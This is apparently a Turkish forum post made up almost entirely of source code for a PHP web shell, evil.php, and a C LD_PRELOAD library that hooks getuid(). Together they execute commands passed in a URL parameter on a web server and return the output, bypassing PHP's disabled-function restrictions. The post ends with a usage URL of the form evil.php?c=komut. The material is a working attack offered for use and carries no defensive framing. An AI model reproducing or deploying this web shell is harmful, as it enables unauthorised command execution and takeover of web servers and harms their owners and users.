a.c kodu:
Code:
#include <stdlib.h> #include <stdio.h> #include <string.h> int getuid() { char *en; char *buf=malloc(300); FILE *a; unsetenv("LD_PRELOAD"); a=fopen(".comm","r"); buf=fgets(buf,100,a); write(2,buf,strlen(buf)); fclose(a); rename("a.so","b.so"); system(buf); system("mv output.txt .comm1"); rename("b.so","a.so"); free(buf); return 0; }
evil.php kodu:
Code:
<?php $path="/var/www"; //change to your writable path $a=fopen($path."/.comm","w"); fputs($a,$_GET["c"]); fclose($a); $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("file", $path."/output.txt","w"), 2 => array("file", $path."/errors.txt", "a" ) ); $cwd = '.'; $env = array('LD_PRELOAD' => $path."/a.so"); $process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed sleep(1); $a=fopen($path."/.comm1","r"); echo "<pre><b>"; while (!feof($a)) {$b=fgets($a);echo $b;} fclose($a); echo "</pre>"; ?>
bypass.www.site.com/evil.php?c=komut